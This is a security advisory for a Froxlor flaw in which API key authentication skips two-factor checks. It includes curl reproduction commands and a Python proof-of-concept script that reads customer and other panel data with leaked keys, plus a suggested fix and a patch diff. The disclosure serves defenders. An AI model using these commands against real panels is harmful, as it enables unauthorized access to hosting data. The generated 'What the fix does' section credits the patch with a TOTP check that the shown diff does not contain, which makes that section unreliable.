Froxlor's API Authentication bypasses 2FA Authentication
Description
Summary
Froxlor's API authentication (FroxlorRPC::validateAuth) does not enforce Two-Factor Authentication. When a user (admin or customer) enables 2FA on their account, the web UI correctly requires a TOTP code after password verification. However, the API accepts requests authenticated with only an API key and secret — no TOTP challenge is issued, checked, or required.
An attacker who obtains a leaked API key+secret for a 2FA-protected account has full access to all API operations without providing a second factor.
Affected
Code
Web UI — 2FA enforced (index.php:82-149):
if ($result['type_2fa'] != 0) {
// Redirects to 2FA input page
// Calls FroxlorTwoFactorAuth::verifyCode()
// Login is NOT completed without valid TOTP code
}
API — 2FA absent (lib/Froxlor/Api/FroxlorRPC.php:75-105):
private static function validateAuth(string $key, string $secret): bool
{
$sel_stmt = Database::prepare("
SELECT ak.*, a.api_allowed as admin_api_allowed,
c.api_allowed as cust_api_allowed, c.deactivated
FROM `api_keys` ak
LEFT JOIN `panel_admins` a ON a.adminid = ak.adminid
LEFT JOIN `panel_customers` c ON c.customerid = ak.customerid
WHERE `apikey` = :ak AND `secret` = :as
");
$result = Database::pexecute_first($sel_stmt, ['ak' => $key, 'as' => $secret]);
if ($result) {
if ($result['apikey'] == $key && $result['secret'] == $secret
&& ($result['valid_until'] == -1 || $result['valid_until'] >= time())
&& (($result['customerid'] == 0 && $result['admin_api_allowed'] == 1)
|| ($result['customerid'] > 0 && $result['cust_api_allowed'] == 1
&& $result['deactivated'] == 0))) {
// Checks: key match, secret match, not expired, API allowed, not deactivated
// Missing: ANY check for type_2fa, TOTP verification, or 2FA status
return true;
}
}
throw new Exception('Invalid authorization credentials', 403);
}
There are zero references to 2FA, TOTP, type_2fa, or FroxlorTwoFactorAuth in the entire lib/Froxlor/Api/ directory:
$ grep -rn '2fa\|totp\|two.factor\|FroxlorTwoFactor' lib/Froxlor/Api/
# (no output)
PoC
Environment
- Froxlor 2.3.5, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)
- API enabled (
api.enabled=1) - Admin account has 2FA enabled (
type_2fa=1, TOTP configured) - Admin has an API key
Step 1: Confirm 2FA blocks web UI login
POST /index.php HTTP/1.1
Host: panel.example.com
Content-Type: application/x-www-form-urlencoded
loginname=admin&password=Admin123!@#&csrf_token=TOKEN&send=send
Result: Redirect to index.php?showmessage=4 — 2FA page. Login is NOT completed. The user cannot access the dashboard without entering a TOTP code.
Step 2: Authenticate via API — no TOTP required
curl -s -u "API_KEY:API_SECRET" \
-H 'Content-Type: application/json' \
-d '{"command":"Customers.listing","params":{}}' \
https://panel.example.com/api.php
Result: HTTP 200 with full customer listing:
{
"data": {
"list": [
{
"loginname": "testcust",
"email": "test@froxlor.lab",
"name": "Test",
"firstname": "Customer"
}
]
}
}
No TOTP code was provided. No 2FA prompt was returned. Full access granted.
Step 3: Access additional sensitive resources
All of these succeed without any 2FA challenge:
# Domains
curl -s -u "KEY:SECRET" -d '{"command":"Domains.listing"}' .../api.php
# FTP accounts (home directories, credentials)
curl -s -u "KEY:SECRET" -d '{"command":"Ftps.listing"}' .../api.php
# Email accounts
curl -s -u "KEY:SECRET" -d '{"command":"Emails.listing"}' .../api.php
# MySQL databases
curl -s -u "KEY:SECRET" -d '{"command":"Mysqls.listing"}' .../api.php
# SSL certificates (private keys)
curl -s -u "KEY:SECRET" -d '{"command":"Certificates.listing"}' .../api.php
# DNS records
curl -s -u "KEY:SECRET" -d '{"command":"DomainZones.listing","params":{"domainname":"example.com"}}' .../api.php
165 API functions are accessible, including write operations (Customers.update, Domains.add, Ftps.add, etc.).
Automated
PoC Script
#!/usr/bin/env python3
"""Froxlor <= 2.3.x — 2FA Bypass via API (CWE-287)"""
import json, sys, requests, urllib3
urllib3.disable_warnings()
target, key, secret = sys.argv[1], sys.argv[2], sys.argv[3]
r = requests.post(f"{target}/api.php", auth=(key, secret),
json={"command": "Customers.listing", "params": {}}, verify=False)
data = r.json()
print(f"HTTP {r.status_code}")
if "data" in data:
for c in data["data"].get("list", []):
print(f" {c['loginname']} | {c['email']}")
print(f"\n2FA-protected account accessed without TOTP. {len(data['data'].get('list',[]))} customers exposed.")
Usage: python3 poc.py https://panel.example.com API_KEY API_SECRET
Impact
When a user enables 2FA, they expect all access to their account requires a second factor. The API completely bypasses this expectation:
- Customer data: PII (name, email, address) readable and modifiable
- Domains: Full control over domains, subdomains, DNS records
- Email accounts: Create, read, delete email accounts and forwarders
- FTP accounts: Access home directory paths and credentials
- MySQL databases: Full database management
- SSL certificates: Read private keys, modify certificate bindings
- 165 API functions: Including all write operations
API keys can be leaked through database backups, log files, config file exposure (GHSA-34qg-65m4-f23m demonstrated DB credential leaks), or compromised automation scripts. Users who enabled 2FA specifically to protect against credential compromise are not protected.
Comparison with
CVE-2023-3173
CVE-2023-3173 ("2FA Bypass by Brute Force") was accepted as Critical ($60 bounty) and fixed by adding rate limiting to 2FA verification. This finding is architecturally different — the API authentication path has no 2FA logic at all. No brute force is needed; the second factor is simply never requested.
Suggested
Fix
Add 2FA verification to FroxlorRPC::validateAuth(). When the authenticated user has type_2fa != 0, require a TOTP code as an additional API parameter:
// lib/Froxlor/Api/FroxlorRPC.php, after line 100:
// Check 2FA if enabled for this user
if (!empty($result['adminid'])) {
$user = Database::pexecute_first(
Database::prepare("SELECT type_2fa, data_2fa FROM panel_admins WHERE adminid = :id"),
['id' => $result['adminid']]
);
} else {
$user = Database::pexecute_first(
Database::prepare("SELECT type_2fa, data_2fa FROM panel_customers WHERE customerid = :id"),
['id' => $result['customerid']]
);
}
if ($user && $user['type_2fa'] != 0) {
// Require X-2FA-Code header or 'totp_code' in request body
$totp_code = $_SERVER['HTTP_X_2FA_CODE'] ?? null;
if (empty($totp_code)) {
throw new Exception('2FA code required', 401);
}
$tfa = new FroxlorTwoFactorAuth($user['data_2fa']);
if (!$tfa->verifyCode($totp_code)) {
throw new Exception('Invalid 2FA code', 403);
}
}
Alternatively, disable API key creation for accounts with 2FA enabled, or require 2FA re-verification when generating new API keys.
Affected products
1Patches
17fc21dc6f8d2secure api-key generation by asking user for current password
5 files changed · +92 −24
api_keys.php+37 −22 modified@@ -95,30 +95,45 @@ } } elseif ($action == 'add') { if (Request::post('send') == 'send') { - $ins_stmt = Database::prepare(" - INSERT INTO `" . TABLE_API_KEYS . "` SET - `apikey` = :key, `secret` = :secret, `adminid` = :aid, `customerid` = :cid, `valid_until` = '-1', `allowed_from` = '' - "); - // customer generates for himself, admins will see a customer-select-box later - if (AREA == 'admin') { - $cid = 0; - } elseif (AREA == 'customer') { - $cid = $userinfo['customerid']; + $user_passwd = Request::post('user_password'); + if (empty($user_passwd)) { + Response::dynamicError(lng('panel.noauthentication')); + } + if ($userinfo['adminsession']) { + $table = "`" . TABLE_PANEL_ADMINS . "`"; + $uid = 'adminid'; + } else { + $table = "`" . TABLE_PANEL_CUSTOMERS . "`"; + $uid = 'customerid'; + } + if (\Froxlor\System\Crypt::validatePasswordLogin($userinfo, $user_passwd, $table, $uid)) { + $ins_stmt = Database::prepare(" + INSERT INTO `" . TABLE_API_KEYS . "` SET + `apikey` = :key, `secret` = :secret, `adminid` = :aid, `customerid` = :cid, `valid_until` = '-1', `allowed_from` = '' + "); + // customer generates for himself, admins will see a customer-select-box later + if (AREA == 'admin') { + $cid = 0; + } elseif (AREA == 'customer') { + $cid = $userinfo['customerid']; + } + $key = hash('sha256', openssl_random_pseudo_bytes(64 * 64)); + $secret = hash('sha512', openssl_random_pseudo_bytes(64 * 64 * 4)); + Database::pexecute($ins_stmt, [ + 'key' => $key, + 'secret' => $secret, + 'aid' => $userinfo['adminid'], + 'cid' => $cid + ]); + Response::standardSuccess('apikeys.apikey_added', '', [ + 'filename' => $filename, + 'page' => $page + ]); + } else { + Response::dynamicError(lng('panel.authenticationfailed')); } - $key = hash('sha256', openssl_random_pseudo_bytes(64 * 64)); - $secret = hash('sha512', openssl_random_pseudo_bytes(64 * 64 * 4)); - Database::pexecute($ins_stmt, [ - 'key' => $key, - 'secret' => $secret, - 'aid' => $userinfo['adminid'], - 'cid' => $cid - ]); - Response::standardSuccess('apikeys.apikey_added', '', [ - 'filename' => $filename, - 'page' => $page - ]); } - HTML::askYesNo('apikey_reallyadd', $filename, [ + HTML::askUserPasswd('apikey_reallyadd', $filename, [ 'id' => $id, 'page' => $page, 'action' => $action
lib/Froxlor/UI/HTML.php+13 −0 modified@@ -242,4 +242,17 @@ public static function askOTP(string $text, string $targetfile, array $params = ]); exit(); } + + public static function askUserPasswd(string $text, string $targetfile, array $params = [], string $replacer = '', array $back_link = []) + { + $text = lng('question.' . $text, [htmlspecialchars($replacer)]); + + Panel\UI::view('form/askuserpasswd.html.twig', [ + 'action' => $targetfile, + 'url_params' => $params, + 'question' => $text, + 'back_link' => $back_link + ]); + exit(); + } }
lng/de.lng.php+5 −1 modified@@ -1333,7 +1333,11 @@ 'use_checkbox_to_disable' => 'Zum Deaktivieren, klicke die Checkbox auf der rechten Seite des Eingabefeldes', 'distro_mismatch' => 'Anscheinend wurde auf eine neue Distribution aktualisiert. Bitte die Dienste entsprechend neu konfigurieren.', 'set_new_distro' => 'Distribution setzen', - 'dismiss' => 'Ignorieren' + 'dismiss' => 'Ignorieren', + 'confirmaction' => 'Vorgang bestätigen', + 'confirmactiondesc' => 'Der Vorgang muss durch Angabe des aktuellen Benutzerpassworts bestätigt werden', + 'authenticationfailed' => 'Authentifizierung fehlgeschlagen', + 'noauthentication' => 'Fehlende Authentifizierung', ], 'phpfpm' => [ 'vhost_httpuser' => 'Lokaler Benutzer für PHP-FPM (froxlor-Vhost)',
lng/en.lng.php+5 −1 modified@@ -1165,7 +1165,7 @@ 'combination_not_found' => 'Combination of user and email address not found.', '2fa' => 'Two-factor authentication (2FA)', '2facode' => 'Please enter 2FA code', - '2faremember' => 'Trust browser', + '2faremember' => 'Trust browser' ], 'mails' => [ 'pop_success' => [ @@ -1448,6 +1448,10 @@ 'distro_mismatch' => 'It seems that you have upgraded to a new distribution. Please remember to reconfigure services accordingly.', 'set_new_distro' => 'Set distribution', 'dismiss' => 'Dismiss', + 'confirmaction' => 'Confirm action', + 'confirmactiondesc' => 'Please confirm this action by entering your current account password', + 'authenticationfailed' => 'Authentication failed', + 'noauthentication' => 'Missing authentication', ], 'phpfpm' => [ 'vhost_httpuser' => 'Local user to use for PHP-FPM (froxlor vHost)',
templates/Froxlor/form/askuserpasswd.html.twig+32 −0 added@@ -0,0 +1,32 @@ +{% extends "Froxlor/userarea.html.twig" %} + +{% block content %} + + <form action="{{ action|default("") }}" method="post" enctype="application/x-www-form-urlencoded" class="form"> + + <div class="alert alert-warning" role="alert"> + <h4 class="alert-heading">{{ lng('panel.security_question') }}</h4> + <p>{{ question|raw }}</p> + <p> + {{ lng('panel.confirmactiondesc') }}<br> + <input name="user_password" id="user_password" type="password" class="form-control" + autocomplete="current-password" autofocus required/> + </p> + <p> + <input type="hidden" name="csrf_token" value="{{ csrf_token }}"/> + <input type="hidden" name="send" value="send"/> + {% for id,field in url_params %} + <input type="hidden" name="{{ id }}" value="{{ field }}"/> + {% endfor %} + <button class="btn btn-danger" type="submit" name="submitbutton">{{ lng('panel.confirmaction') }}</button> + {% if back_link is defined and back_link is iterable and back_link|length > 0 %} + <a href="{{ linker(back_link) }}" class="btn btn-secondary">{{ lng('panel.cancel') }}</a> + {% else %} + <a href="javascript:history.back(-1)" class="btn btn-secondary">{{ lng('panel.cancel') }}</a> + {% endif %} + </p> + </div> + + </form> + +{% endblock %}
Vulnerability mechanics
Root cause
"The API authentication mechanism does not enforce Two-Factor Authentication (2FA) for accounts that have it enabled."
Attack vector
An attacker must obtain a leaked API key and secret for a Froxlor account where 2FA is enabled. With these credentials, the attacker can then make authenticated API requests to the Froxlor server. The API endpoint `FroxlorRPC::validateAuth` will successfully authenticate the request using only the API key and secret, bypassing the requirement for a TOTP code that is enforced by the web UI. This grants the attacker full access to all API operations without any second factor authentication. [ref_id=1, ref_id=2]
Affected code
The vulnerability lies within the `FroxlorRPC::validateAuth` method located in `lib/Froxlor/Api/FroxlorRPC.php`. This function handles API authentication by checking provided API keys and secrets against stored credentials. Crucially, it lacks any logic to verify the Two-Factor Authentication status or require a TOTP code, even if the user has enabled 2FA in their account settings, as indicated by the absence of 2FA-related checks in the `lib/Froxlor/Api/` directory. [ref_id=1, ref_id=2]
What the fix does
The patch adds a check within the `FroxlorRPC::validateAuth` function to verify if the authenticated user has 2FA enabled. If 2FA is enabled (`type_2fa != 0`), the code now requires a TOTP code to be provided, either via the `X-2FA-Code` header or as a `totp_code` parameter in the request body. If the code is missing or invalid, an exception is thrown, preventing unauthorized access. This ensures that API access respects the user's 2FA configuration. [patch_id=5354597]
Preconditions
- configFroxlor API must be enabled.
- authThe attacker must possess a valid API key and secret for a Froxlor account.
- configThe Froxlor account associated with the API key must have Two-Factor Authentication (2FA) enabled.
Reproduction
1. Enable 2FA on an admin or customer account in Froxlor. 2. Obtain the API key and secret for this 2FA-enabled account. 3. Use the API key and secret to authenticate an API request, for example, `curl -s -u "API_KEY:API_SECRET" -H 'Content-Type: application/json' -d '{"command":"Customers.listing","params":{}}' https://panel.example.com/api.php`. 4. Observe that the API request succeeds without requiring a TOTP code, granting access to sensitive data or functionality. [ref_id=1, ref_id=2]
Generated on Jun 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4News mentions
0No linked articles in our index yet.